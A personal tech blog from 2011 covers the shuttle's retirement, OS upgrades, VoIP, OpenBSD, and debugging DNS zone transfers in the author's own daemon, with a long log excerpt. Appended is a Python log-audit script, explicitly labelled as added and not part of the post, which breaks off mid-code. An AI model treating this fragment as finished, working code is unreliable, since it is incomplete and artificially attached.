No, the eagle has not landed. It was the US space shuttle Atlantis that did land at Kennedy Space Center a few days ago. There won't be any more space shuttle launches and some people see this as an embarrassment for the US. I don't see it that way but rather have been watching the reports come in from companies such as SpaceX (Falcon rocket, Dragon capsule). The reports are good and I saw a schedule the other day where we'll see a Dragon capsule scheduled for docking with the ISS (International Space Station). Looking back the shuttle has followed and haunted me in my life, I remember the first time I heard about it when the Challenger blew up upon launch. That was the first memory I have of the shuttle. Not exactly a good one. At that time we had immigrated to Canada and I learned that the Canadarm (the shuttle's robotic arm) was Canada's contribution to the shuttle. A decade and a half later I immigrated back to Germany and not too soon after that the Columbia disintegrated upon re-entry over Texas. Another haunting memory, but I can say that whenever I migrated around the globe that a shuttle and its crew was lost. My role models were German and Canadian Astronauts. Such as Ulf Merbold, Thomas Reiter, Chris Hadfield, Marc Garneau, Roberta Bondar, are some that come to mind. All of them flew on the shuttle I believe as mission specialists and carried the dream to their respective nations with stories of another state of being (in freefall/in space). So what's next now that the shuttles don't rise anymore? Like I said SpaceX, Russian Soyuz, European Soyuz and ATV, Chinese, Japanese and Indian space rockets and a slew of other commercial carriers all striving for manned space flight. And since most commercial manned space programs are American it's not an embarrassment but another national hope/treasure. The shuttle was prohibitively expensive and we need the cheaper alternatives that are now up and coming.
So with that I say "you did well ol' shuttle fleet, now rest in peace", and I'm thrilled with the future on what's to come.



leopard -> snow leopard, no problem!

July 24th, 2011

I bought Snow Leopard for my dad yesterday. We installed it on his Mac Book which has a Core 2 Duo processor. No files were lost but the only thing we did was upgrade VMware Fusion from 2.0.8 to 3.1.3 which cost 30.70 euros plus tax. I'm not sure we needed to upgrade the Fusion but it was a surety thing. The initial update after installing Mac OS X 10.6.3 was a 1 GB update to take us to 10.6.8 or something. It was quite a download over the 3 Mbps DSL but it will be nothing compared to the Mac OS X Lion download that we'll be conducting next week. :-).



snow leopard -> lion

July 30th, 2011

Today we purchased and downloaded Mac OS X Lion (10.7). Everything went smoothly. I finally got the Macbook to run in 64 bit mode too. Interesting is that Lion has a "pfctl" command. That's new!



Turned on comments

August 5th, 2011

I did a bit of programming today and turned on comments on the blog. You can view them when you click on the articles themselves. No captcha yet though. I hope you find this useful at all, I don't really but I'm willing to take this next big step. Comments are restricted to 8000 bytes or something so keep it short.



Got new SIP (VOIP) phone

August 6th, 2011

Yesterday, I got my new sip phone. It's a Grandstream GXP 2100. I'm looking forward to making it work, but it works already. The voice clarity is great. Last week I signed up to sipgate.de for a sip account and I'm getting rates of 1 cent per minute in Germany. There is a flatrate for this but I'll have to see if it's worth it. Also I'm unsure whether I'm getting billed for incoming calls, something I'll have to figure out.



SVPRadio the new Stratford sound

August 7th, 2011

For the past 20 weeks or so a friend and I have been working weekly on a new project. SVPradio is an Internet Radio station for Stratford, Ontario residents and it broadcasts for 6 hours every week (on Wednesdays). While my friend DJ Jaz handles the organization and sound I took care of the behind the scenes setup that an Internet Radio station needs. Another friend of mine offered us his server for this which was very nice. Our weekly traffic is still very low as we're not well known yet but word is spreading surely as now the DJ'ing is done from the storefront of Stratford's Compudoc. Here is a picture: In this picture I believe you see DJ Wigs who does a drum-bass and jungle show. All in all the people who make SVPradio happen are great and the shows are always interesting. We always wanted to have SVPradio since our teenager years and the name "SVP" was picked back then as well. What it stands for I'll leave to your imagination as we don't want to reveal that yet. One fitting acronym is "Stratford's very pretty". I'm looking forward to the next 20 weeks and perhaps our listener volume will increase too.



1/6 of my traffic is IPv6 traffic

August 10th, 2011

$ printf "em0\ngif0\n" | while read i ; do netstat -nsbI $i|head -2 ; done
Name    Mtu   Network     Address               Ibytes     Obytes
em0     1500        00:90:0b:19:56:04 36803931395 6075787347
Name    Mtu   Network     Address               Ibytes     Obytes
gif0    1280                          5926981413  823262847
$ uptime
10:31PM  up 103 days,  1:47, 1 user, load averages: 0.50, 0.39, 0.36
$ 
The output reveals the IPv4 and IPv6 interfaces on my home host uranus. gif0 is tunneled over em0 so the 6GB are part of em0's 36GB.



Grandstream GXP-2100 Phonebook Generator

August 12th, 2011

I made a smallish script that produces an .xml file that the grandstream phone can grok for its telephone book. I didn't want to store this on my SIP provider's interface because I don't want to reveal the numbers that I have stored other than when I dial them.

	GRANDSTREAM PHONEBOOK GENERATOR V 1.0

	1. ENTER PHONE NUMBER
	2. DISPLAY ALL PHONE NUMBERS
	3. GENERATE PHONEBOOK
	4. EXIT
The script is too simple really. I could stick more effort into it but then it wouldn't be my philosophy of being uber-lazy. Here is the script.



More german translations / Mehr Uebersetzungen

August 21st, 2011

I have translated some more hackepedia articles to German over the last few weeks and want to give you an update. Direct your browser to: hackepedia german translations and see the following entries:

-rw-r--r-- 1 uranus shusers  9125 2011-08-10 21:25 index.html
-rw-r--r-- 1 uranus shusers   620 2011-08-11 17:49 ppid.html
-rw-r--r-- 1 uranus shusers   521 2011-08-11 17:51 pop.html
-rw-r--r-- 1 uranus shusers  3219 2011-08-11 18:13 permissions.html
-rw-r--r-- 1 uranus shusers   702 2011-08-11 18:18 pppoe.html
-rw-r--r-- 1 uranus shusers  1493 2011-08-12 17:12 pipe.html
-rw-r--r-- 1 uranus shusers  6951 2011-08-12 17:50 ppp.html
-rw-r--r-- 1 uranus shusers  5102 2011-08-12 21:28 traceroute.html
-rw-r--r-- 1 uranus shusers  2040 2011-08-15 20:26 newfs.html
-rw-r--r-- 1 uranus shusers  3535 2011-08-21 15:50 privilige-escalation.html

Here are a few more translations into German. hackepedia in Germany.



Growing a partition on OpenBSD under VMware Workstation 7.1

September 2nd, 2011

I ran out of space on my OpenBSD vm that I use for most everything. So I did the following:

  1. shut off vm
  2. under settings of vm, disk select utilities, expand
  3. grew my partition from 25 GB to 30 GB
  4. saved
  5. booted vm into single user mode
  6. used fdisk -e wd0 to grow the fdisk
  7. used disklabel -E wd0 to grow the last partition (/home)
  8. (yeah I was lucky /home was the last partition and it needed growing)
  9. used growfs /dev/wd0k
  10. fsck -y /dev/wd0k
  11. mount -a
  12. control-d to go into multiuser mode
  13. partition was grown 5 GB's
Hope this helps whomever.



Free Bradley Manning

September 3rd, 2011

I've been subscribed to the Bradley Manning group on Facebook for a while now. This particular photo intrigued me. It's fitting now that ALL the wikileaks cables have been released. This particular billboard is found in Kansas City, USA. Free Bradley Manning!



OpenBSD 5.0 song any day now...

September 3rd, 2011

I've researched when we should be getting hold of the song of OpenBSD 5.0. Last year for OpenBSD 4.8 and the year before for OpenBSD 4.6 the release date was between September 8th and 11th. So sometime in the next 8 days we should get a new treat. I can hardly wait!



Data Retention Law Ideas / Datenspeicherung Gesetz Ideen

September 3rd, 2011

When it comes to data retention for law enforcement, where do you draw the line between helping law enforcement and preventing a police state? I had a quick thought about this and was thinking why don't service providers give their data to the law enforcement in real-time with a twist. The data is encrypted with a random key string and the key is then deleted. The police have to then brute-force crack the encryption costing them resources (electricity, cpu time). This discourages cracking too much because society's energy resources are not endless and computers are expensive. As computers get more powerful the crypto is adjusted to match more powerful algorithms. The police have a turnaround of X amount of days or hours to break 1 record and society as a whole is protected from the panopticon.

When you handle access data and hand it to the police, where do you draw the line between helping the police and avoiding a police state? I had a short pause for thought about this and figured it should be possible for the providers to hand over the access data in real time, but with one big change: the data is encrypted with a random password and the key is then destroyed. The police then have to break the encryption, which costs them time and money (electricity and computer time). This procedure is meant to discourage the police from cracking all the data, since society's energy is not endless and computers (mainframes) cost a lot of money. As computers become more powerful the crypto is adjusted as well, so that it always takes some time until a file (record) is cracked. The police have some time, several hours or days, to crack one record, and society is protected from the panopticon.

PS: You can use all crypto algorithms available in order to strengthen the entire scheme. If for example AES is broken mathematically but Twofish is not then only those records encrypted with AES are vulnerable to being opened on a mass scale. I have a book where there is at least 30 algorithms listed, some weaker and some stronger, some broken and some good to go with, if all of them are used then chances are good for a non-policestate.



OpenBSD 5.0 pre-orders announced & song

September 7th, 2011

Today Theo de Raadt, made the 5.0 song available. He also said pre-orders are now activated. Shortly afterwards OpenBSD Europe said they'd also offer pre-orders a few hours later.

Now about the song. The theme is based on MAD Magazine. In my lifetime I maybe bought 1 MAD magazine and I didn't like it. I didn't understand it though because I was a German immigrant to North America and didn't know the English language too well. But the song did surprise me, I would have never guessed the direction it took this time, good job.



Possibly going to EuroBSDCon 2011

September 15th, 2011

I've been approved holidays on the week that EuroBSDCon is held in the Netherlands. So I may just go there. I'll likely get the registration out of the way the next week or so. It's been 11 years since I've last been at a BSDCon, the last time was in Monterey in California. It's a good thing I got a bit of savings as it's going to cost a bit, but it's likely worth it.



Wildcarddnsd and AXFR

September 17th, 2011

Wildcarddnsd does passive AXFR now. I finally hammered the code into the thing and debugged it over a period of 2 weeks. So what I've done is changed goldflipper.net's name daemon to bind9 and it now AXFR queries the zones from uranus.centroid.eu doing AXFR. The code of this isn't publicly available yet as I haven't committed it yet, but if everything goes well I'll look at committing within the next 2 weeks.

Also there have been some core changes in wildcarddnsd, more on that later.



Going to EuroBSDCon for sure

September 18th, 2011

Well I just paid the registration including 1 tutorial. I'll be attending the "Building the network you need with PF, the OpenBSD packet filter" tutorial by Peter N. M. Hansteen. I'm hoping to pick up some nifty tricks and get more familiar with the packet filter in general. Then I'll also attend the conference and social event. I enter Amsterdam on the 5th of October and then take the train to Maarssen on the 6th. On the 7th is the tutorial and 8th and 9th are the conference, on the 10th I'm going back to Germany by train and on the 11th I go back to work. Well I wish I could say see you there, but what the hell. See you there.



Equinox in 5 days

September 18th, 2011

Equinox is upon us again and will indicate that Autumn has arrived in the northern hemisphere.

For German readers, the equinox is here again in five days. For .de that means autumn.



Mega-commit on Wildcarddnsd

September 19th, 2011

Well the AXFR code is in the wild now (:P). Here is a commit message that should be very informative on what was changed.



Wildcarddnsd Handbook

September 28th, 2011

I've created a small Handbook for the design and implementation of the Wildcarddnsd program. It may be interesting to some and you could learn something from it. I'm thinking of one day making this into a magicpoint presentation for speaking somewhere.



Bye Bye seti@home, Hello Rosetta@home

September 28th, 2011

I've been doing seti@home on and off before it was a BOINC task. However I'm getting weary of waiting for news of SETI discoveries. It's time to do something new. Out goes seti@home and in goes Rosetta@home. Rosetta@home is similar to Docking@home which I also participate in. It's really time to dedicate my computer to humans instead of aliens, we're in greater need (in our ignorance). If you're interested in what my BOINC stats are, here they are. I'm in spot 142,597 out of 2.2 million and dropping by 19 daily. That's OK though I'm not complaining.



Weird BIND9 observance

September 29th, 2011

Ever since I put in IXFR support in Wildcarddnsd I have been watching the logs and I have a very weird problem. Basically all zones except one DON'T get pulled. What's weird about this is that I'd expect either all zones get pulled on a regular basis or none like all but one are doing right now. When I restarted bind9 on goldflipper.net it pulled a zone update for centroid.eu and ever since has been pulling it on a regular basis. The SOA is the same on both goldflipper.net and uranus.centroid.eu:

$ dig +short soa centroid.eu @uranus.centroid.eu
uranus.centroid.eu. pjp.centroid.eu. 1316729113 3600 1800 1209600 86400
$ dig +short soa centroid.eu @ipv4.goldflipper.net
uranus.centroid.eu. pjp.centroid.eu. 1316729113 3600 1800 1209600 86400
Below is roughly an 80 line log of wildcarddnsd AXFR operations to show you what I mean.
Sep 29 10:52:37 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa." type=SOA(6) class=1, answering
 "4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa."
Sep 29 11:06:45 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.centroid.eu." type=SOA(6) class=1, answering "ipv6.centroid.eu."
Sep 29 11:09:01 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"centroid.eu." type=SOA(6) class=1, answering "centroid.eu."
Sep 29 11:09:02 uranus wildcarddnsd[7545]: AXFR connection from 
200.46.208.61 on interface "em0"
Sep 29 11:09:02 uranus wildcarddnsd[9575]: IXFR request for zone 
"centroid.eu.", replying...
Sep 29 11:11:32 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"solarscale.de." type=SOA(6) class=1, answering "solarscale.de."
Sep 29 11:21:45 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"swpegasus.de." type=SOA(6) class=1, answering "swpegasus.de."
Sep 29 11:33:05 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"goldflipper.net." type=SOA(6) class=1, answering "goldflipper.net."
Sep 29 11:35:17 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.solarscale.de." type=SOA(6) class=1, answering "ipv6.solarscale.de."
Sep 29 11:50:35 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa." type=SOA(6) class=1, answering 
"4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa."
Sep 29 11:55:40 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.centroid.eu." type=SOA(6) class=1, answering "ipv6.centroid.eu."
Sep 29 11:58:49 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"centroid.eu." type=SOA(6) class=1, answering "centroid.eu."
Sep 29 11:58:50 uranus wildcarddnsd[7545]: AXFR connection from 
200.46.208.61 on interface "em0"
Sep 29 11:58:50 uranus wildcarddnsd[1519]: IXFR request for zone 
"centroid.eu.", replying...
Sep 29 12:07:16 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"solarscale.de." type=SOA(6) class=1, answering "solarscale.de."
Sep 29 12:08:14 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"swpegasus.de." type=SOA(6) class=1, answering "swpegasus.de."
Sep 29 12:20:39 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"goldflipper.net." type=SOA(6) class=1, answering "goldflipper.net."
Sep 29 12:25:34 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.solarscale.de." type=SOA(6) class=1, answering "ipv6.solarscale.de."
Sep 29 12:38:01 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa." type=SOA(6) class=1, 
answering "4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa."
Sep 29 12:43:14 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.centroid.eu." type=SOA(6) class=1, answering "ipv6.centroid.eu."
Sep 29 12:45:44 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"centroid.eu." type=SOA(6) class=1, answering "centroid.eu."
Sep 29 12:45:44 uranus wildcarddnsd[7545]: AXFR connection from 
200.46.208.61 on interface "em0"
Sep 29 12:45:44 uranus wildcarddnsd[28509]: IXFR request for zone 
"centroid.eu.", replying...
Sep 29 12:59:30 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"solarscale.de." type=SOA(6) class=1, answering "solarscale.de."
Sep 29 13:07:35 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"swpegasus.de." type=SOA(6) class=1, answering "swpegasus.de."
Sep 29 13:16:02 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"goldflipper.net." type=SOA(6) class=1, answering "goldflipper.net."
Sep 29 13:23:37 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.solarscale.de." type=SOA(6) class=1, answering "ipv6.solarscale.de."
Sep 29 13:34:29 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa." type=SOA(6) class=1, answering 
"4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa."
Sep 29 13:41:04 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.centroid.eu." type=SOA(6) class=1, answering "ipv6.centroid.eu."
Sep 29 13:45:00 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"centroid.eu." type=SOA(6) class=1, answering "centroid.eu."
Sep 29 13:45:00 uranus wildcarddnsd[7545]: AXFR connection from 
200.46.208.61 on interface "em0"
Sep 29 13:45:00 uranus wildcarddnsd[5739]: IXFR request for zone 
"centroid.eu.", replying...
Sep 29 13:56:28 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"solarscale.de." type=SOA(6) class=1, answering "solarscale.de."
Sep 29 14:01:17 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"swpegasus.de." type=SOA(6) class=1, answering "swpegasus.de."
Sep 29 14:15:23 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"goldflipper.net." type=SOA(6) class=1, answering "goldflipper.net."
Sep 29 14:15:56 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.solarscale.de." type=SOA(6) class=1, answering "ipv6.solarscale.de."
Sep 29 14:22:09 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa." type=SOA(6) class=1, answering 
"4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa."
Sep 29 14:36:45 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"centroid.eu." type=SOA(6) class=1, answering "centroid.eu."
Sep 29 14:36:45 uranus wildcarddnsd[7545]: AXFR connection from 
200.46.208.61 on interface "em0"
Sep 29 14:36:46 uranus wildcarddnsd[24765]: IXFR request for zone 
"centroid.eu.", replying...
Sep 29 14:39:57 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.centroid.eu." type=SOA(6) class=1, answering "ipv6.centroid.eu."
Sep 29 14:42:54 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"solarscale.de." type=SOA(6) class=1, answering "solarscale.de."
Sep 29 14:58:11 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"swpegasus.de." type=SOA(6) class=1, answering "swpegasus.de."
Sep 29 15:01:45 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.solarscale.de." type=SOA(6) class=1, answering "ipv6.solarscale.de."
Sep 29 15:07:53 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"goldflipper.net." type=SOA(6) class=1, answering "goldflipper.net."
Sep 29 15:21:41 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa." type=SOA(6) class=1, answering 
"4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa."
Sep 29 15:24:44 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"centroid.eu." type=SOA(6) class=1, answering "centroid.eu."
Sep 29 15:24:44 uranus wildcarddnsd[7545]: AXFR connection from 
200.46.208.61 on interface "em0"
Sep 29 15:24:45 uranus wildcarddnsd[24475]: IXFR request for zone 
"centroid.eu.", replying...
Sep 29 15:35:52 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.centroid.eu." type=SOA(6) class=1, answering "ipv6.centroid.eu."
Sep 29 15:40:33 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"solarscale.de." type=SOA(6) class=1, answering "solarscale.de."
Sep 29 15:48:48 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"swpegasus.de." type=SOA(6) class=1, answering "swpegasus.de."
Sep 29 15:57:30 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.solarscale.de." type=SOA(6) class=1, answering "ipv6.solarscale.de."
Sep 29 16:02:28 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"goldflipper.net." type=SOA(6) class=1, answering "goldflipper.net."
Sep 29 16:17:02 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa." type=SOA(6) class=1, 
answering "4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa."
Sep 29 16:21:36 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"centroid.eu." type=SOA(6) class=1, answering "centroid.eu."
Sep 29 16:21:36 uranus wildcarddnsd[7545]: AXFR connection from 
200.46.208.61 on interface "em0"
Sep 29 16:21:37 uranus wildcarddnsd[28113]: IXFR request for zone 
"centroid.eu.", replying...
Sep 29 16:27:13 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.centroid.eu." type=SOA(6) class=1, answering "ipv6.centroid.eu."
Sep 29 16:29:53 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"solarscale.de." type=SOA(6) class=1, answering "solarscale.de."
Sep 29 16:42:54 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.solarscale.de." type=SOA(6) class=1, answering "ipv6.solarscale.de."
Sep 29 16:47:16 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"swpegasus.de." type=SOA(6) class=1, answering "swpegasus.de."
Sep 29 16:56:16 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"goldflipper.net." type=SOA(6) class=1, answering "goldflipper.net."
Sep 29 17:09:33 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"centroid.eu." type=SOA(6) class=1, answering "centroid.eu."
Sep 29 17:09:33 uranus wildcarddnsd[7545]: AXFR connection from 
200.46.208.61 on interface "em0"
Sep 29 17:09:33 uranus wildcarddnsd[15234]: IXFR request for zone 
"centroid.eu.", replying...
Sep 29 17:12:10 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa." type=SOA(6) class=1, answering 
"4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa."
Sep 29 17:17:59 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"solarscale.de." type=SOA(6) class=1, answering "solarscale.de."
Sep 29 17:23:17 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.centroid.eu." type=SOA(6) class=1, answering "ipv6.centroid.eu."
Sep 29 17:36:57 uranus wildcarddnsd[14017]: request on descriptor 24 	
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"swpegasus.de." type=SOA(6) class=1, answering "swpegasus.de."
Sep 29 17:39:57 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.solarscale.de." type=SOA(6) class=1, answering "ipv6.solarscale.de."
Sep 29 17:43:05 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"goldflipper.net." type=SOA(6) class=1, answering "goldflipper.net."
Sep 29 17:58:41 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"centroid.eu." type=SOA(6) class=1, answering "centroid.eu."
Sep 29 17:58:41 uranus wildcarddnsd[7545]: AXFR connection from 
200.46.208.61 on interface "em0"
Sep 29 17:58:41 uranus wildcarddnsd[16657]: IXFR request for zone 
"centroid.eu.", replying...
Sep 29 18:03:31 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa." type=SOA(6) class=1, answering 
"4.7.0.f.0.6.a.0.1.0.0.2.ip6.arpa."
Sep 29 18:12:30 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"ipv6.centroid.eu." type=SOA(6) class=1, answering "ipv6.centroid.eu."
Sep 29 18:13:11 uranus wildcarddnsd[14017]: request on descriptor 24 
interface "em0" from 200.46.208.61 (ttl=0, region=255) for 
"solarscale.de." type=SOA(6) class=1, answering "solarscale.de."
I sent an email to the BIND-users mail list but I think it got stopped by the mail administrator or got dumped to /dev/null.
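
An added example, not part of the original post: a parser for wildcarddnsd log lines in the format above that reports, per zone, how often the SOA was polled and how many polls were followed by a transfer, and flags transfers from addresses outside an allowlist. The allowlist, the year, the 5-second pairing window and the two records from 192.0.2.77 are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Sample: the first eight records reuse values from the log above; the last two
# (from 192.0.2.77) are constructed. Lines are wrapped as in the post.
SAMPLE_LOG = """\
Sep 29 15:24:44 uranus wildcarddnsd[14017]: request on descriptor 24
interface "em0" from 200.46.208.61 (ttl=0, region=255) for
"centroid.eu." type=SOA(6) class=1, answering "centroid.eu."
Sep 29 15:24:44 uranus wildcarddnsd[7545]: AXFR connection from
200.46.208.61 on interface "em0"
Sep 29 15:24:45 uranus wildcarddnsd[24475]: IXFR request for zone
"centroid.eu.", replying...
Sep 29 15:40:33 uranus wildcarddnsd[14017]: request on descriptor 24
interface "em0" from 200.46.208.61 (ttl=0, region=255) for
"solarscale.de." type=SOA(6) class=1, answering "solarscale.de."
Sep 29 16:21:36 uranus wildcarddnsd[14017]: request on descriptor 24
interface "em0" from 200.46.208.61 (ttl=0, region=255) for
"centroid.eu." type=SOA(6) class=1, answering "centroid.eu."
Sep 29 16:21:36 uranus wildcarddnsd[7545]: AXFR connection from
200.46.208.61 on interface "em0"
Sep 29 16:21:37 uranus wildcarddnsd[28113]: IXFR request for zone
"centroid.eu.", replying...
Sep 29 16:29:53 uranus wildcarddnsd[14017]: request on descriptor 24
interface "em0" from 200.46.208.61 (ttl=0, region=255) for
"solarscale.de." type=SOA(6) class=1, answering "solarscale.de."
Sep 29 16:30:10 uranus wildcarddnsd[7545]: AXFR connection from
192.0.2.77 on interface "em0"
Sep 29 16:30:10 uranus wildcarddnsd[28200]: IXFR request for zone
"centroid.eu.", replying...
"""

STAMP = re.compile(r"^[A-Z][a-z]{2} [ \d]\d \d\d:\d\d:\d\d ")
QUERY = re.compile(r'request on descriptor \d+ interface "[^"]+" from (\S+) '
                   r'\(.*?\) for "([^"]+)" type=(\w+)\(')
CONN = re.compile(r"AXFR connection from (\S+) on interface")
XFER = re.compile(r'IXFR request for zone "([^"]+)"')


def unwrap(text):
    """Rejoin wrapped lines: a record starts at a syslog timestamp."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if STAMP.match(line) or not records:
            records.append(line)
        else:
            records[-1] += " " + line
    return records


def audit(text, allowed, year=2011, window=timedelta(seconds=5)):
    """Return (per-zone statistics, findings) for a wildcarddnsd log excerpt."""
    polls = defaultdict(list)   # zone -> [(time, source)] of SOA queries
    xfers = defaultdict(list)   # zone -> [(time, source)] of transfer requests
    last_conn = None            # (time, source) of the latest transfer connection
    for rec in unwrap(text):
        if not STAMP.match(rec):
            continue            # the excerpt started in the middle of a record
        when = datetime.strptime(f"{year} {rec[:15]}", "%Y %b %d %H:%M:%S")
        if m := QUERY.search(rec):
            if m.group(3) == "SOA":
                polls[m.group(2)].append((when, m.group(1)))
        elif m := CONN.search(rec):
            last_conn = (when, m.group(1))
        elif m := XFER.search(rec):
            # The transfer line has no address; pair it with the connection
            # logged just before it (a heuristic, not a daemon guarantee).
            src = "unknown"
            if last_conn and when - last_conn[0] <= window:
                src = last_conn[1]
            xfers[m.group(1)].append((when, src))
    zones, findings = {}, []
    for zone in sorted(set(polls) | set(xfers)):
        times = [t for t, _ in polls[zone]]
        followed = sum(
            any(s == src and timedelta(0) <= t - when <= window
                for t, s in xfers[zone])
            for when, src in polls[zone])
        zones[zone] = {
            "polls": len(times),
            "transfers": len(xfers[zone]),
            "polls_followed_by_transfer": followed,
            "poll_intervals_s": [int((b - a).total_seconds())
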